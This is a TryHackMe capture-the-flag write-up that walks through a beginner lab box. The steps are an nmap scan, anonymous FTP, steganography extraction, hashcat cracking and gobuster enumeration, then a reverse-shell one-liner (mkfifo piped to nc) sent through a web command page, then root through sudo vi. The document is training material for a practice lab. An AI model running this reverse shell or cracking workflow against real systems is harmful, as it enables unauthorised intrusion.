Hello everyone.so,after a long time i’m writing this writeup.This one is from Tryhackme.For this room,we need to have little bit knowledge on stegno.So let’s begin the hunt.Basically this is a beginner friendly room.In my opinion it is very easy to solve.

i’m using kali linux as my attacker machine and connected through VPN to tryhackme

First things,let’s find the open ports and services that are running.

“nmap -sC -sV -vv -oN scan”

This scan gave us some open ports and services and their versions that are running.

21/tcp open ftp syn-ack vsftpd 3.0.3
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-rw-r — 1 1000 1000 208838 Sep 30 2020 gum_room.jpg
| ftp-syst:
| FTP server status:
| Connected to ::ffff:
| Logged in as ftp
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 — secure, fast, stable
|_End of status
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| ssh-hostkey:
| 2048 16:31:bb:b5:1f:cc:cc:12:14:8f:f0:d8:33:b0:08:9b (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuEAWoQHbW+vehIUZLTiJyXKjUAAJP0sgW/P0LHVaf4C5+1oEBXcDBBZC7SoL6MTMYn8zlEfhCbjQb7A/Yf2IxLzU5f35yuhEbWEvYmuP4PmBB04CJdDItU0xwAbGsufyzZ6td6LKm+oim8xJn/lVTeykVZTASF9iuY9tqwA933AfjqKlNByj82TAmlVkQ93bq+e7Gu/pRkSn++RkIUd4f8ogmLLusEh+vbGkZDj4UdwTIZbOSeuS4oz/umpkJPhekGVoyzjPMRIq9cwdeKIVRwUNbp4BoJjYKjbCC9YY8u/7O6lhtwo4uAp7Q9PfRRCiCpVimm6kIgBmgqqKbueDl
| 256 e7:1f:c9:db:3e:aa:44:b6:72:10:3c:ee:db:1d:33:90 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAYfNs0w6oOdzMM4B2JyB5pWr1qq9oB+xF0Voyn4gBYEGPC9+dqPudYagioH1ArjIHZFF0G24rt7L/6x1OPJSts=
| 256 b4:45:02:b6:24:8e:a9:06:5f:6c:79:44:8a:06:55:5e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAwurtl1AFxJU7cHOfbCNr34YoTmAVnVUIXt4QHPD1B2
80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).

Above is the scan result.SO now let’s explore the ftp.as we can see anonymous login is allowed.so,let’s login and find what is there.

We logged in as anonymous user.now let’s list the files in the ftp server.

So we have image.So let’s download this image to our main machine and analyze it.

It’s downloaded.Now let’s find anything is hidden or not.

Yes,there is some king of weired text file is embeded.So,let’s extract it using steghide.

Now let’s find what’s inside.so it’s a base64 encoded text.So,let’s decode it.

“cat b64.txt| base64 -d |tee decoded.txt”

We found some hashes here.So let’s crack the hash using hashcat.

“hashcat hash -m 1800 /usr/share/wordlists/rockyou.txt”

While this is running let’s explore the website.

There is a login page.But we don’t know the credentials.Let’s enumerate further.

Let’s user gobuster to find the file.

gobuster dir -u -w /usr/share/wordlists/dirb/big.txt -t 50 -x .txt,.php,.html

SO this got me this.

There is an interesting file home.php.so let’s open it.

So ,wow,we can execute commands from here.So let’s get a shell.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4242 >/tmp/f

so we are in.

So let’s convert this shell into tty bash shell.

if check validate.php we’ll find a password for the user charlie.so let’s try to login as charlie.But failed.so let’s go to the user directory. So i found a ssh private and public keys in charlie’s directory .Let’s login as charlie using those keys.

NOw let’s root the box.unfortunately charlie can run vi as root.

So to get the root.

Yes i’m the owner of this factory now.We can also complete this box in another way.But i found this way is quite interesting to hack in.I hope you guys enjoy this one.




Ethical Hacker,Dream chaser.